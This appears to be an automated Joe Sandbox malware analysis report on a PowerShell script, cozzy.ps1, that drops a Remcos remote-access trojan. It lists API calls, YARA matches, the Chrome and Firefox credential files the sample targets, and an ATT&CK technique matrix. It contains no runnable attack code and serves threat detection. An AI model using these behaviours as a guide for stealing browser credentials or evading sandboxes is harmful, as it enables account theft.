Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: EnumSystemLocalesW,	4_2_004520E2
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: EnumSystemLocalesW,	4_2_00452097
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: EnumSystemLocalesW,	4_2_0045217D
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	4_2_0045220A
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: EnumSystemLocalesW,	4_2_0044844E
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: GetLocaleInfoW,	4_2_0045245A
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_00452583
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: GetLocaleInfoW,	4_2_0045268A
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_00452757
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: GetLocaleInfoW,	4_2_00448937
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	4_2_00451E1F

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Queries volume information: C:\Users\user\Desktop\cozzy.ps1 VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: 4_2_00404961 GetLocalTime,CreateEventA,CreateThread,

4_2_00404961

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: 4_2_0041BB0E GetComputerNameExW,GetUserNameW,

4_2_0041BB0E

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: 4_2_004491DA _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

4_2_004491DA

Source: C:\Users\user\AppData\Local\Temp\x.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 4.0.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.13631b20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.13631b20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3887419828.000000000068E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.1509095444.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1513560750.0000000013551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3887222641.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1513560750.0000000013631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x.exe PID: 7332, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAAsm.exe PID: 7516, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe, type: DROPPED

Contains functionality to steal Chrome passwords or cookies

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

4_2_0040B59B

Contains functionality to steal Firefox passwords or cookies

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		4_2_0040B6B5
Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe	Code function: \key3.db		4_2_0040B6B5

Remote Access Functionality

Detected Remcos RAT

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-7J4RV4

Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 4.0.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.13631b20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.x.exe.13631b20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegAAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.3887419828.000000000068E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.1509095444.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1513560750.0000000013551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3887222641.0000000000459000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1513560750.0000000013631000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x.exe PID: 7332, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAAsm.exe PID: 7516, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe, type: DROPPED

Source: C:\Users\user\AppData\Local\Temp\RegAAsm.exe

Code function: cmd.exe

4_2_00405091

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	22 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	1 Windows Service	1 Bypass User Account Control	1 Deobfuscate/Decode Files or Information	111 Input Capture	1 Account Discovery	Remote Desktop Protocol	111 Input Capture	2 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	2 Service Execution	Logon Script (Windows)	1 Access Token Manipulation	2 Obfuscated Files or Information	2 Credentials In Files	1 System Service Discovery	SMB/Windows Admin Shares	3 Clipboard Data	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	1 Windows Service	1 Software Packing	NTDS	4 File and Directory Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	1 DLL Side-Loading	LSA Secrets	33 System Information Discovery	SSH	Keylogging	212 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Bypass User Account Control	Cached Domain Credentials	121 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	31 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report cozzy.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Remcos

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
cozzy.ps1